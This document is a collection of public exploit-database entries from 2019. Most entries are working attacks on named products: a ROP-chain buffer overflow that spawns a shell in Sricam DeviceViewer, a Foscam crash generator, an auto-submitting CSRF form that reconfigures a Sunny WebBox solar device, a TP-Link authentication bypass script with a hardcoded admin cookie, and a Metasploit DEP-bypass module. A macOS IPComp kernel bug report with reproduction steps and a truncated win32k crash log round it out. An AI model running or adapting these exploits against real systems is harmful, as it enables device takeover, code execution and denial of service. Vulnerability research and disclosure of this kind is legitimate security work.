# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass) # Date: 08/10/2019 # Exploit Author: Alessandro Magnosi # Vendor Homepage: http://www.sricam.com/ # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe # Version: v3.12.0.1 # Exploit type: Local # Tested on: Windows 7 SP1 # Steps to reproduce: # 1. Get the WinExec address from arwin.exe kernel32.dll WinExec # 2. Change the related address in the PoC # 3. Generate the payload using the PoC # 4. Log in the Sricam DeviceViewer application # 5. Go to System Configuration -> User Management # 6. Put the content of the generated file in User Info -> Username # 7. Click on Add # 8. A command shell will appear #!/usr/bin/python from struct import pack, unpack def create_rop_chain(): rops = [ 0x6a1142aa, # XOR EDX,EDX # RETN 0x6a569810, # POP EDX # RETN [avcodec-54.dll] 0x6ae9c126, # &Writable location [avutil-50.dll] 0x6a5dac8a, # POP EAX # RETN 0xff9b929d, # NEG "cmd\0" 0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll] 0x6994766b, # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll] 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a18e062, # ADD ESP, 10 # RETN ---> ESI 0x6a2420ea, # ROP NOP ---> EDI 0x6a45e446, # XCHG EAX,EDX # RETN [avcodec-54.dll] 0x6a29d716, # XCHG EAX,ECX # RETN [avcodec-54.dll] ## ECX = ascii "cmd\0" 0x6a569810, # POP EDX # RETN [avcodec-54.dll] 0x6a36264a, # CALL EBX ## EDX = CALL EBX 0x6a5dac8a, # POP EAX # RETN 0x76e33231, # ptr to WinExec() [kernel32.dll] #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication 0x6a150411, # XCHG EAX,EBX # RETN [avcodec-54.dll] ## EBX = &WinExec 0x6a5dac8a, # POP EAX # RETN 0xffffffff, # -0x00000001-> ebx 0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll] ## EAX = 1 0x6a5eb992, # PUSHAD # RETN [avcodec-54.dll] 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP 0x6a2420ea, # ROP NOP ] return ''.join(pack('<I', _) for _ in rops) def nops(length): return "\x90" * length rop_chain = create_rop_chain() maxlen = 5000 # Stack pivoting address # 0x6a443e58 : {pivot 2252 / 0x8cc} : # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll] seh = pack("<I", 0x6a443e58) # Don't care nseh nseh = nops(4) payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300) sec = maxlen - len(payload) payload += nops(sec) # More junk to reach 5000 print("Exploit Length: " + str(len(payload))) try: fname = "exprop.txt" exploit = open(fname,"w") print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit") print("Author: Alessandro Magnosi\n") print("[*] Creating evil username") exploit.write(payload) exploit.close() print("[+] Username file created\n") print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>") print("[+] A command shell will open") except: print("[!] Error creating the file")

# Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC) # Author: Alessandro Magnosi # Date: 2019-10-09 # Vendor Homepage: https://www.foscam.com/ # Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5 # Tested Version: 1.1.6.6 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it # Steps to Produce the Crash: # 1.- Run python code : python foscam-vms-uid-dos.py # 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard # 3.- Open FoscamVMS # 4.- Go to Add Device # 5.- Choose device type "NVR" # 6.- Copy the content of the file into UID # 7.- Click on Login Check # 8.- Crashed #!/usr/bin/python buffer = "A" * 5000 f = open ("FoscamVMS1.1.6.txt", "w") f.write(buffer) f.close()

=== Summary === This report describes a bug in the XNU implementation of the IPComp protocol (https://tools.ietf.org/html/rfc3173). This bug can be remotely triggered by an attacker who is able to send traffic to a macOS system (iOS AFAIK isn't affected) *over two network interfaces at the same time*. === Some basics to provide context === IPComp is a protocol for compressing the payload of IP packets. The XNU implementation of IPComp is (going by the last public XNU release) enabled only on X86-64; ARM64 doesn't seem to have the feature enabled at all (look for ipcomp_zlib in config/MASTER.x86_64 and config/MASTER.arm64). In other words, it's enabled on macOS and disabled on iOS. While IPComp is related to IPsec, the IPComp input path processes input even when the user has not configured any IPsec stuff on the system. zlib requires fairly large buffers for decompression and especially for compression. In order to avoid allocating such buffers for each packet, IPComp uses two global z_stream instances "deflate_stream" and "inflate_stream". If IPComp isn't used, the buffer pointers in these z_stream instances remain NULL; only when IPComp is actually used, the kernel will attempt to initialize the buffer pointers. As far as I can tell, the IPComp implementation of XNU has been completely broken for years, which makes it impossible to actually reach the decompression code. ipcomp_algorithm_lookup() is responsible for allocating global buffers for the compression and decompression code; however, all of these allocations go through deflate_alloc(), which (since xnu-1228, which corresponds to macOS 10.5 from 2007) calls _MALLOC() with M_NOWAIT. _MALLOC() leads to kalloc_canblock(), which, if the M_NOWAIT flag was set and the allocation is too big for a kalloc zone (size >= kalloc_max_prerounded), immediately returns NULL. On X86-64, kalloc_max_prerounded is 0x2001; both deflateInit2() and inflateInit2() attempt allocations bigger than that, causing them to fail with Z_MEM_ERROR, as is visible with dtrace when observing the system's reaction to a single incoming IPComp packet [empty lines removed]: ``` bash-3.2# ./inflate_test.dtrace dtrace: script './inflate_test.dtrace' matched 11 probes CPU ID FUNCTION:NAME 0 243037 deflateInit2_:entry deflate init (thread=ffffff802db84a40) 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x1738, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0xffffff80496b9800 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x2000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0xffffff802f42f000 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x2000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x20000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x20000, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 243038 deflateInit2_:return rval=0xfffffffc 0 243073 inflateInit2_:entry inflate init (thread=ffffff802db84a40) 0 224285 kalloc_canblock:entry kalloc_canblock(size=0x2550, canblock=0, site=ffffff8018e787e8) 0 224286 kalloc_canblock:return kalloc_canblock()=0x0 0 243074 inflateInit2_:return rval=0xfffffffc ``` (On iOS, the kalloc() limit seems to be higher, so if IPComp was built there, the input path might actually work?) === main bug description === IPComp uses a single global `static z_stream inflate_stream` for decompressing all incoming packets. This global is used without any locking. While processing of packets from a single interface seems to be single-threaded, packets arriving on multiple ethernet interfaces at the same time (or on an ethernet interface and a non-ethernet interface) can be processed in parallel (see dlil_create_input_thread() and its caller for the precise threading rules). Since zlib isn't designed for concurrent use of a z_stream, this leads to memory corruption. If IPComp actually worked, I believe that this bug would lead to things like out-of-bounds reads, out-of-bounds writes and use-after-frees. However, since IPComp never actually manages to set up the compression and decompression state, the bug instead manifests in the code that, for every incoming IPComp packet, attempts to set up the deflate buffers and tears down the successfully allocated buffers because some of the allocations failed: ``` int ZEXPORT deflateInit2_(z_streamp strm, int level, int method, int windowBits, int memLevel, int strategy, const char *version, int stream_size) { [...] if (memLevel < 1 || memLevel > MAX_MEM_LEVEL || method != Z_DEFLATED || windowBits < 8 || windowBits > 15 || level < 0 || level > 9 || strategy < 0 || strategy > Z_FIXED) { return Z_STREAM_ERROR; } if (windowBits == 8) windowBits = 9; /* until 256-byte window bug fixed */ s = (deflate_state *) ZALLOC(strm, 1, sizeof(deflate_state)); if (s == Z_NULL) return Z_MEM_ERROR; strm->state = (struct internal_state FAR *)s; [...] s->window = (Bytef *) ZALLOC(strm, s->w_size, 2*sizeof(Byte)); s->prev = (Posf *) ZALLOC(strm, s->w_size, sizeof(Pos)); s->head = (Posf *) ZALLOC(strm, s->hash_size, sizeof(Pos)); s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */ overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2); s->pending_buf = (uchf *) overlay; [...] if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL || s->pending_buf == Z_NULL) { [...] deflateEnd (strm); return Z_MEM_ERROR; } [...] } [...] int ZEXPORT deflateEnd(z_streamp strm) { [...] /* Deallocate in reverse order of allocations: */ TRY_FREE(strm, strm->state->pending_buf); TRY_FREE(strm, strm->state->head); TRY_FREE(strm, strm->state->prev); TRY_FREE(strm, strm->state->window); ZFREE(strm, strm->state); strm->state = Z_NULL; return status == BUSY_STATE ? Z_DATA_ERROR : Z_OK; } ``` When multiple executions of this code race, it is possible for two threads to free the same buffer, causing a double-free: ``` *** Panic Report *** panic(cpu 2 caller 0xffffff8012802df5): "zfree: double free of 0xffffff80285d9000 to zone kalloc.8192\n"@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.261.4/osfmk/kern/zalloc.c:1304 Backtrace (CPU 2), Frame : Return Address 0xffffff912141b420 : 0xffffff80127aea2d mach_kernel : _handle_debugger_trap + 0x47d 0xffffff912141b470 : 0xffffff80128e9e95 mach_kernel : _kdp_i386_trap + 0x155 0xffffff912141b4b0 : 0xffffff80128db70a mach_kernel : _kernel_trap + 0x50a 0xffffff912141b520 : 0xffffff801275bb40 mach_kernel : _return_from_trap + 0xe0 0xffffff912141b540 : 0xffffff80127ae447 mach_kernel : _panic_trap_to_debugger + 0x197 0xffffff912141b660 : 0xffffff80127ae293 mach_kernel : _panic + 0x63 0xffffff912141b6d0 : 0xffffff8012802df5 mach_kernel : _zcram + 0xa15 0xffffff912141b710 : 0xffffff8012804d4a mach_kernel : _zfree + 0x67a 0xffffff912141b7f0 : 0xffffff80127bac58 mach_kernel : _kfree_addr + 0x68 0xffffff912141b850 : 0xffffff8012dfc837 mach_kernel : _deflateEnd + 0x87 0xffffff912141b870 : 0xffffff8012dfc793 mach_kernel : _deflateInit2_ + 0x253 0xffffff912141b8c0 : 0xffffff8012c164a3 mach_kernel : _ipcomp_algorithm_lookup + 0x63 0xffffff912141b8f0 : 0xffffff8012c16fb2 mach_kernel : _ipcomp4_input + 0x112 0xffffff912141b990 : 0xffffff8012b89907 mach_kernel : _ip_proto_dispatch_in_wrapper + 0x1a7 0xffffff912141b9e0 : 0xffffff8012b8bfa6 mach_kernel : _ip_input + 0x18b6 0xffffff912141ba40 : 0xffffff8012b8a5a9 mach_kernel : _ip_input_process_list + 0xc69 0xffffff912141bcb0 : 0xffffff8012aac3ed mach_kernel : _proto_input + 0x9d 0xffffff912141bce0 : 0xffffff8012a76c41 mach_kernel : _ether_attach_inet + 0x471 0xffffff912141bd70 : 0xffffff8012a6b036 mach_kernel : _dlil_rxpoll_set_params + 0x1b36 0xffffff912141bda0 : 0xffffff8012a6aedc mach_kernel : _dlil_rxpoll_set_params + 0x19dc 0xffffff912141bf10 : 0xffffff8012a692e9 mach_kernel : _ifp_if_ioctl + 0x10d9 0xffffff912141bfa0 : 0xffffff801275b0ce mach_kernel : _call_continuation + 0x2e BSD process name corresponding to current thread: kernel_task Boot args: -zp -v keepsyms=1 Mac OS version: 18F132 Kernel version: Darwin Kernel Version 18.6.0: Thu Apr 25 23:16:27 PDT 2019; root:xnu-4903.261.4~2/RELEASE_X86_64 Kernel UUID: 7C8BB636-E593-3CE4-8528-9BD24A688851 Kernel slide: 0x0000000012400000 Kernel text base: 0xffffff8012600000 __HIB text base: 0xffffff8012500000 System model name: Macmini7,1 (Mac-XXXXXXXXXXXXXXXX) ``` === Repro steps === You'll need a Mac (I used a Mac mini) and a Linux workstation. Stick two USB ethernet adapters into the Mac. Make sure that your Linux workstation has two free ethernet ports; if it doesn't, also stick USB ethernet adapters into your workstation. Take two ethernet cables; for both of them, stick one end into the Linux workstation and the other end into the Mac. Set up static IP addresses for both interfaces on the Linux box and the Mac. I'm using: - Linux, first connection: 192.168.250.1/24 - Mac, first connection: 192.168.250.2/24 - Linux, second connection: 192.168.251.1/24 - Mac, second connection: 192.168.251.2/24 On the Linux workstation, ping both IP addresses of the Mac, then dump the relevant ARP table entries: ``` $ ping -c1 192.168.250.2 PING 192.168.250.2 (192.168.250.2) 56(84) bytes of data. 64 bytes from 192.168.250.2: icmp_seq=1 ttl=64 time=0.794 ms [...] $ ping -c1 192.168.251.2 PING 192.168.251.2 (192.168.251.2) 56(84) bytes of data. 64 bytes from 192.168.251.2: icmp_seq=1 ttl=64 time=0.762 ms [...] $ arp -n | egrep '192\.168\.25[01]' 192.168.250.2 ether aa:aa:aa:aa:aa:aa C eth0 192.168.251.2 ether bb:bb:bb:bb:bb:bb C eth1 $ ``` On the Linux workstation, build the attached ipcomp_uaf.c and run it: ``` $ gcc -o ipcomp_recursion ipcomp_recursion.c -Wall $ sudo bash # ./ipcomp_uaf usage: ./ipcomp_uaf <if1> <target_mac1> <src_ip1> <dst_ip1> <if2> <target_mac2> <src_ip2> <dst_ip2> # ./ipcomp_uaf eth0 aa:aa:aa:aa:aa:aa 192.168.250.1 192.168.250.2 eth1 bb:bb:bb:bb:bb:bb 192.168.251.1 192.168.251.2 ``` After something like a second, you should be able to observe that the Mac panics. I have observed panics via double-free and via null deref triggered by the PoC. (Stop the PoC afterwards, otherwise it'll panic again as soon as the network interfaces are up.) (The PoC also works if you use broadcast addresses as follows: ``` # ./ipcomp_uaf eth0 ff:ff:ff:ff:ff:ff 0.0.0.0 255.255.255.255 eth1 ff:ff:ff:ff:ff:ff 0.0.0.0 255.255.255.255 ```) === Fixing the bug === I believe that by far the best way to fix this issue is to rip out the entire feature. Unless I'm missing some way for the initialization to succeed, it looks like nobody can have successfully used this feature in the last few years; and apparently nobody felt strongly enough about that to get the feature fixed. At the same time, this thing is remote attack surface in the IP stack, and it looks like it has already led to a remote DoS bug in the past - the first search result on bing.com for both "ipcomp macos" and "ipcomp xnu" is <https://www.exploit-db.com/exploits/5191>. In case you decide to fix the bug in a different way, please note: - I believe that this can *NOT* be fixed by removing the PR_PROTOLOCK flag from the entries in `inetsw` and `inet6sw`. While removal of that flag would cause the input code to take the domain mutex before invoking the protocol handler, IPv4 and IPv6 are different domains, and so concurrent processing of IPv4+IPComp and IPv6+IPComp packets would probably still trigger the bug. - If you decide to fix the memory allocation of IPComp so that the input path works again (please don't - you'll never again have such a great way to prove that nobody is using that code), I think another bug will become reachable: I don't see anything that prevents unbounded recursion between ip_proto_dispatch_in() and ipcomp4_input() using an IP packet with a series of IPComp headers, which would be usable to cause a kernel panic via stack overflow with a single IP packet. In case you want to play with that, I wrote a PoC that generates packets with 100 such headers and attached it as ipcomp_recursion.c. (The other IPv6 handlers for pseudo-protocols like IPPROTO_FRAGMENT seem to avoid this problem by having the ) Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47479.zip

# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery # Date: 2019-10-08 # Exploit Author: Borja Merino and Eduardo Villaverde # Vendor Homepage: https://www.sma.de # Version: Firmware Version 1.6 and prior # Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6) # CVE : CVE-2019-13529 # ICS-Cert Advisory: https://www.us-cert.gov/ics/advisories/icsa-19-281-01 <!-- Change any hidden value --> <iframe style="display:none" name="csrf-frame"></iframe> <form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form"> <input type='hidden' name='RadioButtonDhcp' value='off'> <input type='hidden' name='IpAddr' value='1.1.1.1'> <input type='hidden' name='SubnetMask' value='255.255.255.0'> <input type='hidden' name='Gateway' value='1.1.1.1'> <input type='hidden' name='DnsIpAddr' value='5.5.5.1'> <input type='hidden' name='Dns2IpAddr' value='5.5.5.2'> <input type='hidden' name='StaticNatPortHttp' value='80'> <input type='hidden' name='WebserverPort' value='80'> <input type='hidden' name='WebservicePort' value='80'> <input type='hidden' name='RadioButtonModbus' value='off'> <input type='hidden' name='ModbusPort' value='502'> <input type='hidden' name='BConfirm' value='Confirmar'> <input type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script>

# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass # Date: 2019-06-20 # Exploit Author: Uriel Kosayev # Vendor Homepage: https://www.tp-link.com # Version: TL-WR1043ND V2 # Tested on: TL-WR1043ND V2 # CVE : CVE-2019-6971 # CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971 import requests ascii = ''' __________ __ _ __ /_ __/ __ \ / / (_)___ / /__ / / / /_/ /_____/ / / / __ \/ //_/ / / / ____/_____/ /___/ / / / / ,< /_/ /_/ /_____/_/_/ /_/_/|_| ''' print(ascii) Default_Gateway = raw_input("Enter your TP-Link router IP: ") # Constants url = 'http://' url2 = '/userRpm/LoginRpm.htm?Save=Save' full = url + Default_Gateway + url2 # full = str(full) # The full GET request with the cookie authorization hijacked req_header = { 'Host': '{}'.format(Default_Gateway), 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway), 'Connection': 'close', 'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''', 'Upgrade-Insecure-Requests': '1' } try: response = requests.get(full, headers=req_header).content except requests.exceptions.ConnectionError: print("Enter a valid Default Gateway IP address\nExiting...") exit() generate = response.split('/')[3] # Gets the randomized URL "session ID" option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ") if option_1 is 1: if generate in response: print('Vulnerable!\n') option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ') if option_2 is 2: newssid = raw_input('New name: ') ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format( newssid) changessid_full = url + Default_Gateway + '/' + generate + ssid_url requests.get(changessid_full, headers=req_header) print('Changed to: {}'.format(newssid)) else: ("Please choose the correct option.\nExiting...") exit() else: print('Not Vulnerable') exit() else: print("Please choose the correct option.\nExiting...") exit()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)", 'Description' => %q{ This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7. By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC }, 'License' => MSF_LICENSE, 'Author' => [ 'Maxim Guslyaev', # EDB POC, Metasploit Module ], 'References' => [ [ 'CVE', '2017-15221' ], [ 'EDB', '47468' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 Enterprise/10 Pro', { 'Ret' => 0x1002D038 # RET } ] ], 'Payload' => { 'BadChars' => "\x00\x09\x0a" }, 'Privileged' => false, 'DisclosureDate' => "Oct 06 2019", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx']) ]) end def exploit buf = "http://" buf += "A" * 17417 + [target.ret].pack("V") + "CCCC" ## Save allocation type (0x1000) in EDX buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN buf += [0x11111111].pack("V") buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN buf += [0x1002D493].pack("V") # POP EDX # RETN buf += [0xEEEEFEEF].pack("V") buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN buf += [0x41414141].pack("V") ## Save the address of VirtualAlloc() in ESI buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll] buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll] buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN buf += [0x41414141].pack("V") buf += [0x41414141].pack("V") ## Save the size of the block in EBX buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN ## Save the address of (# ADD ESP,8 # RETN) in EBP buf += [0x10031c6c].pack("V") # POP EBP # RETN buf += [0x10012316].pack("V") # ADD ESP,8 # RETN #buf += [0x1003df73].pack("V") # & PUSH ESP # RETN ## Save memory protection code (0x40) in ECX buf += [0x1002ca22].pack("V") # POP ECX # RETN buf += [0xFFFFFFFF].pack("V") buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN ## Save ROP-NOP in EDI buf += [0x1002e346].pack("V") # POP EDI # RETN buf += [0x1002D038].pack("V") # RETN ## Save NOPs in EAX #buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] #buf += [0x90909090].pack("V") # nop ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address buf += [0x1002E516].pack("V") # POP EAX # RETN buf += [0xA4E2F275].pack("V") buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN buf += [0x10040ce5].pack("V") # PUSH EAX # RETN buf += "\x90" * 4 buf += [0x1003df73].pack("V") # & PUSH ESP # RETN buf += "\x90" * 20 buf += payload.encoded file_create(buf) end end

We have encountered a Windows kernel crash in the win32k.sys driver while processing a corrupted TTF font file. An example crash log excerpt generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF900C1E1C003,0x0000000000000001,0xFFFFF9600006D2A8,0x0000000000000000) Driver at fault: *** win32k.sys - Address FFFFF9600006D2A8 base at FFFFF96000010000, DateStamp 5d0c4490 [...] 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff900c1e1c003, memory referenced. Arg2: 0000000000000001, value 0 = read operation, 1 = write operation. Arg3: fffff9600006d2a8, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: fffff880082791f0 -- (.trap 0xfffff880082791f0) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=fffff900c1e1bfb8 rdx=000000000000000a rsi=0000000000000000 rdi=0000000000000000 rip=fffff9600006d2a8 rsp=fffff88008279380 rbp=000000000000000c r8=fffff960002f5750 r9=0000000000000002 r10=fffff900c1e1bfe9 r11=fffff900c1e1bff3 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc win32k!ulClearTypeFilter+0x214: fffff960`0006d2a8 8807 mov byte ptr [rdi],al ds:00000000`00000000=?? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80002b65a22 to fffff80002ab1520 STACK_TEXT: fffff880`08278928 fffff800`02b65a22 : fffff900`c1e1c003 fffffa80`310f1b50 00000000`00000065 fffff800`02a82658 : nt!RtlpBreakWithStatusInstruction fffff880`08278930 fffff800`02b66812 : fffff880`00000003 fffff880`082791f0 fffff800`02aba420 fffff880`08278f90 : nt!KiBugCheckDebugBreak+0x12 fffff880`08278990 fffff800`02aaada4 : 00000000`00000068 fffff880`08279450 00000000`00010000 00000000`00000000 : nt!KeBugCheck2+0x722 fffff880`08279060 fffff800`02b847b2 : 00000000`00000050 fffff900`c1e1c003 00000000`00000001 fffff880`082791f0 : nt!KeBugCheckEx+0x104 fffff880`082790a0 fffff800`02ab6ddc : 00000000`00000001 fffff900`c1e1c003 00000000`00000000 fffff900`c1e1bf94 : nt!MmAccessFault+0x2322 fffff880`082791f0 fffff960`0006d2a8 : 00000000`00000000 fffff800`00000001 fffff880`08279450 fffff900`c1e1bf94 : nt!KiPageFault+0x35c fffff880`08279380 fffff960`0007097a : fffff900`c1a40010 fffff900`c1a40010 fffff880`08279928 00000000`00000002 : win32k!ulClearTypeFilter+0x214 fffff880`08279400 fffff960`0006ce00 : fffff880`0827b67b fffff880`08279928 fffff900`c1b71010 fffff960`00000b70 : win32k!xInsertMetricsPlusRFONTOBJ+0x20e fffff880`082794d0 fffff960`0006caa0 : fffff880`08279a00 fffff880`08279928 00000000`00000000 00000000`0000000a : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f0 fffff880`08279550 fffff960`0006c498 : 00000000`00000000 fffff880`082796f0 fffff900`c00cb010 00000000`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168 fffff880`082795d0 fffff960`0006d955 : 00000000`41800000 00000000`00000000 00000000`00000007 fffff880`082796f0 : win32k!ESTROBJ::vInit+0x350 fffff880`08279660 fffff960`0006d5f7 : fffff880`08279b60 fffff900`c1a40010 fffffa80`00000020 00000000`ffffffff : win32k!GreGetTextExtentExW+0x275 fffff880`08279920 fffff800`02ab8d53 : 00000000`5a010611 fffff880`00000b40 00000000`00000040 00000000`00000000 : win32k!NtGdiGetTextExtentExW+0x237 fffff880`08279a70 00000000`74da204a : 00000000`74d8c46f 00000000`00010000 00000000`74d8b947 00000000`002ff888 : nt!KiSystemServiceCopyEnd+0x13 00000000`001adca8 00000000`74d8c46f : 00000000`00010000 00000000`74d8b947 00000000`002ff888 00000000`75ad5600 : wow64win!NtGdiGetTextExtentExW+0xa 00000000`001adcb0 00000000`74dcd18f : 00000000`002ff88c 00000000`7efdb000 00000000`7efdb000 00000000`7efdd000 : wow64win!whNtGdiGetTextExtentExW+0x43 00000000`001add00 00000000`74d52776 : 00000000`779a01e4 00000000`74dc0023 00000000`00000246 00000000`002ffeec : wow64!Wow64SystemServiceEx+0xd7 00000000`001ae5c0 00000000`74dcd286 : 00000000`00000000 00000000`74d51920 00000000`777d3128 00000000`7780c4f1 : wow64cpu!ServiceNoTurbo+0x2d 00000000`001ae680 00000000`74dcc69e : 00000000`00000000 00000000`00000000 00000000`74dc4b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa 00000000`001ae6d0 00000000`778043c3 : 00000000`004f2d50 00000000`00000000 00000000`77902e70 00000000`777d7550 : wow64!Wow64LdrpInitialize+0x42a 00000000`001aec20 00000000`77869780 : 00000000`00000000 00000000`77876c7d 00000000`001af1d0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3 00000000`001af110 00000000`7781371e : 00000000`001af1d0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x22790 00000000`001af180 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe --- cut --- The type of the bugcheck implies a 